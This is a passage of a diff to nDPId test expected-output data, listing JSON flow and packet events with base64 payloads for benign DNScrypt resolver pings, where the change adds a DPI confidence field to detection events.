AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":22,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAABQFy4Aub0RMeAKAAABPtK0RwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":22,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAXcFy8gAL0RDQwKAAABPtK0R9AzBB0GBAVtByIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":24,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAABQFy8Aub0RMd8KAAABPtK0RwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":24,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946739299355,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739299355,"pkt":"ZmZmZmZmRERERERECABFAADWguYAADURTls+0rRHCgAAAQQdxzwAwvgJByeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAD603DX03HFYUGSUUMZQ5AFHqQDCbcRbndp5mF3SVu19eScXuGrpg2nLc5WDzV06y+FJw+Dah4cv34QVXrvZ7Q8nY1y4iPNLnPDmhCiX6M9Qv8kZOhpPDs+tmijF9ICJLydjXLiI80ucXop2NF6KdjRga6m0"}
 00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946739299356,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739299356,"pkt":"ZmZmZmZmRERERERECABFAADWguUAADQRT1w+0rRHCgAAAQQdzZwAwvGtByOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAD603DX03HFYUGSUUMZQ5AFHqQDCbcRbndp5mF3SVu19eScXuGrpg2nLc5WDzV06y+FJw+Dah4cv34QVXrvZ7Q8nY1y4iPNLnPDmhCiX6M9Qv8kZOhpPDs+tmijF9ICJLydjXLiI80ucXop2NF6KdjRga6m0"}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAXcHPkgAL0RfJ0KAAABuYbEN9HBIPsGBAgHfxoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAIcHPpAAL0RYFwKAAABuYbEN5IlIPsCCECUfx8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":29,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAABQHPkAub0RoXAKAAABuYbENwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":29,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAXcHPsgAL0RfJsKAAABuYbEN4i9IPsGBFEJfxwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":31,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAABQHPsAub0RoW4KAAABuYbENwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
